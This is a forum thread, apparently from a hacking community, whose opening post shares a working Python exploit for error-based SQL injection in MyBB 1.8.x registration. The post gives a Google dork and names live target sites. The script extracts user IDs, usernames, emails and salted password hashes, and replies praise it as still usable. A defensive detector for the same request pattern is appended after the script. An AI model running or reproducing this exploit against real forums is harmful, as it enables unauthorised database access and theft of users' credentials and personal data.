Mybb 1.8.x Exploit
#1




# Exploit Title: MyBB 1.8.X <= 1.8.1 Error based SQL Injection
# Date : 2014-11-15
# Google Dork : intext:Powered By MyBB
# Vendor Homepage: http://www.mybb.com/
# Software Link: http://resources.mybb.com/downloads/mybb_1801.zip
# Version: 1.8.X
# Tested on: Linux / Python 2.7
# Status : Patched in MyBB 1.8.2
# Author : MakMan
# Live Vulnerable Targets : http://livedemo.installatron.com/1416038193mybb/


PHP Code:
#!/usr/bin/env python
# Exploit Title: MyBB 1.8.X <= 1.8.1 Error based SQL Injection
# Date : 2014-11-15
# Google Dork : intext:Powered By MyBB
# Vendor Homepage: http://www.mybb.com/
# Software Link: http://resources.mybb.com/downloads/mybb_1801.zip
# Version: 1.8.X
# Tested on: Linux / Python 2.7
# Status : Patched in MyBB 1.8.2
# Author : MakMan -- mak.man@live.com -- https://www.facebook.com/hackticlabs
# Live Vulnerable Targets : http://livedemo.installatron.com/1416038193mybb/ : http://gamergate.community/

print '\n\n---------------------------------------------------------------------------------'
print 'Script Coded by MakMan -- Hacktic Labs -- https://www.facebook.com/hackticlabs'
print '-----------------------MyBB 1.8.X Error based SQL Injection---------------------'
print '---------------------------------------------------------------------------------\n\n\n'
url = raw_input('Enter URL http://www.exmaple.com/path_to_mybb :: ')
url = url.rstrip('/')
ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"

import sys, re
import urllib2, urllib

def inject(sql):
    try:
        urllib2.urlopen(urllib2.Request('%s/member.php' % url, data="regcheck1=&regcheck2=true&username=makman&password=mukarram&password2=mukarram&email=mak@live.com&email2=mak@live.com&referrername=&imagestring=F7yR4&imagehash=1c1d0e6eae9c113f4ff65339e4b3079c&answer=4&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2&regtime=1416039333&step=registration&action=do_register&regsubmit=Submit+Registration!&question_id=makman%s" % urllib.quote("\' and updatexml(NULL,concat (0x3a,(%s)),NULL) and \'1" % sql), headers={"User-agent": ua}))
    except urllib2.HTTPError, e:
        data = e.read()
        if e.code == 503:
            # The query result comes back inside the database error text
            txt = re.search("XPATH syntax error: ':(.*)'", data, re.MULTILINE)
            if txt is not None:
                return txt.group(1)
            return 'Error , received unexpected data!!'
        sys.exit('Not Vulnerable i guess !!!')
    sys.exit('Not Vulnerable or check your inernet connection !!')

def get(name, table, num):
    sqli = 'SELECT %s FROM %s LIMIT %d,1' % (name, table, num)
    s = int(inject('LENGTH((%s))' % sqli))
    if s < 31:
        return inject(sqli)
    else:
        # Longer values are read back in 31-character chunks
        r = ''
        for i in range(1, s+1, 31):
            r += inject('SUBSTRING((%s), %i, %i)' % (sqli, i, 31))
        return r

# The hex literals are the regexps "avatardimensions$" and "users$"
members_table = inject('select table_name from information_schema.columns where table_schema=database() and column_name regexp 0x61766174617264696d656e73696f6e7324 and table_name regexp 0x757365727324 limit 0,1')
n = inject('SELECT COUNT(*) FROM %s' % members_table)
print '----------------------------------------------------------------------------'
print '* Found %s users' % n
print '----------------------------------------------------------------------------'
for j in range(int(n)):
    print '{:20s} {:20s}'.format('Id', get('uid', members_table, j))
    print '{:20s} {:20s}'.format('Name', get('username', members_table, j))
    print '{:20s} {:20s}'.format('Email', get('email', members_table, j))
    print '{:20s} {:20s}'.format('Password : Salt', get('CONCAT(password,0x3a,salt)', members_table, j))
    print '----------------------------------------------------------------------------'

Good luck with it.
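A defender-side check for the request pattern the script above sends, as an added example that is not part of the original post: it parses form-encoded registration bodies posted to `member.php` and flags a `question_id` field carrying SQL syntax, plus 503 responses that leak a MySQL XPATH error. The function name `inspect`, the record layout, the sample records and the rule that a legitimate `question_id` is a short alphanumeric token are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs, quote

# Assumption: a legitimate question_id is a short alphanumeric token.
TOKEN_RE = re.compile(r"^[A-Za-z0-9]{1,64}$")
# MySQL XML functions whose error messages echo attacker-chosen data.
ERROR_FUNCS_RE = re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I)
# Database error text surfacing in the HTTP response body.
LEAK_RE = re.compile(r"XPATH syntax error: '")


def inspect(record):
    """Return findings for one record: dict with path, body, status, response."""
    findings = []
    if not record["path"].endswith("/member.php"):
        return findings
    fields = parse_qs(record["body"], keep_blank_values=True)
    if fields.get("action") != ["do_register"]:
        return findings
    for value in fields.get("question_id", []):
        if ERROR_FUNCS_RE.search(value):
            findings.append("error-based SQL function in question_id")
        elif not TOKEN_RE.match(value):
            findings.append("question_id is not a plain token")
    if record["status"] == 503 and LEAK_RE.search(record["response"]):
        findings.append("response leaks MySQL XPATH error")
    return findings


# Constructed sample records (not captured traffic).
BENIGN = {"path": "/forum/member.php", "status": 200,
          "body": "action=do_register&username=alice&question_id=" + "a" * 32,
          "response": "Thank you for registering"}
SUSPECT = {"path": "/forum/member.php", "status": 503,
           "body": "action=do_register&username=x&question_id=" + quote(
               "abc' and updatexml(NULL,concat(0x3a,(SELECT 1)),NULL) and '1"),
           "response": "XPATH syntax error: ':1'"}
QUOTE_ONLY = {"path": "/forum/member.php", "status": 200,
              "body": "action=do_register&username=y&question_id=abc%27",
              "response": ""}

if __name__ == "__main__":
    for name, rec in (("benign", BENIGN), ("suspect", SUSPECT),
                      ("quote-only", QUOTE_ONLY)):
        print(name, inspect(rec))
```

Hits on either rule point to probing of an install older than MyBB 1.8.2, the release the post's header lists as patched.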
#2
Nice work, good share.
People don't change; the only things that change are circumstances and interests...
#3
(28-06-2015, 11:32) iMoGeN wrote: Nice work, good share.

I had left out the exploit link since it would count as advertising, though.
#4
Nice work, my friend.
#5
Nice work; it's a bit dated, but there are probably still people using it.